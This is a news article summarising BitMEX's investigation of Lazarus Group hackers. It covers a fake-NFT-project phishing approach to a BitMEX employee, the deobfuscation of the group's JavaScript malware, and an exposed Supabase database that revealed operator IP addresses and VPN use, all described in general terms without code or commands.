BitMEX Developers Uncover Details About Lazarus Group Hackers After Accessing Their Database

BitMEX has released a detailed article on its blog outlining the many exploits of North Korea's Lazarus Group related to recent attacks against its crypto exchange. The Lazarus Group, notorious for targeting the crypto sector, employed various tricks and tactics to steal funds from unsuspecting crypto holders. Their malicious activities have targeted various exchanges, including Phemex and Bybit. They even approached a BitMEX employee with a phony project to disguise a phishing attempt and install malicious software on the employee's device.

However, now BitMEX is fighting back, taking a deep dive into the malicious code used by the hacking group. The exchange has discovered serious vulnerabilities that exchanges can exploit to protect their assets, including exposure of the group's tracking databases and origin IP addresses. Moreover, BitMEX can track its operational hours and isolate actors pivotal to the hacking group's operations.

BitMEX has identified different tiers for hackers, with amateur hackers assigned to phishing tasks and highly skilled hackers assigned to post-exploitation procedures. The exchange blogged about various measures to be implemented to detect security breaches in real time, including an internal monitoring system to detect infections.

BitMEX's sudden interest in cybersecurity stems from a Lazarus Group member contacting a BitMEX employee on LinkedIn, offering a proposal to join a fake NFT project. However, the exchange was not impressed by this brazen phishing attempt and decided to investigate further. The hacker provided BitMEX with access to a next.js / React project on GitHub, which allowed the team to analyze live Lazarus code.

The researchers discovered that the code was designed to entice employees to run malicious code on their systems. A Lazarus Supabase was uncovered by BitMEX researchers, revealing data relating to the malware, including username, hostname, operating system, geolocation, timestamp, and IP address. The exchange was able to classify various devices as either a developer or test machine due to the frequency of operation.

Many developers were using VPNs to obfuscate their location, but one developer slipped up at some stage, revealing the actual IP address of the machine, which is located in Jiaxing, China, and uses a China Mobile IP address. BitMEX believes this was a major operational failure and could reveal the hacker's identity.

The Supabase also revealed which VPN services the hackers were using. To analyze the Supabase and search for operational mistakes automatically, BitMEX developed a script. Even hackers make mistakes, which can be highly costly for them.

According to BitMEX developers, hackers have various technical abilities and reside in a hierarchy of operations. The exchange could exploit such a detail by searching for mistakes made by novice hackers. One hacker had attempted to reuse a program named 'BeaverTail' but implemented it incorrectly, nearly exposing a personal IP address.

This mistake allowed BitMEX to enhance its security by categorizing attack victims so that it could detect operational mistakes made by novice hackers. JavaScript deobfuscation significantly impacted BitMEX developers because the Lazarus Group relied heavily on obfuscated code. They used creative methods, such as Webcrack's symbol renaming function, to find the malware.

The BitMEX team had deobfuscated previous malware and was prepared for the task ahead. However, they noticed that the code had a new function connected to a Supabase database and added details about the victim's machine. The Supabase allowed attackers to create a database on the fly without needing an API layer.

BitMEX developers knew programmers often do not secure such a database with authentication, which could be exploited to perform more analysis about the attackers.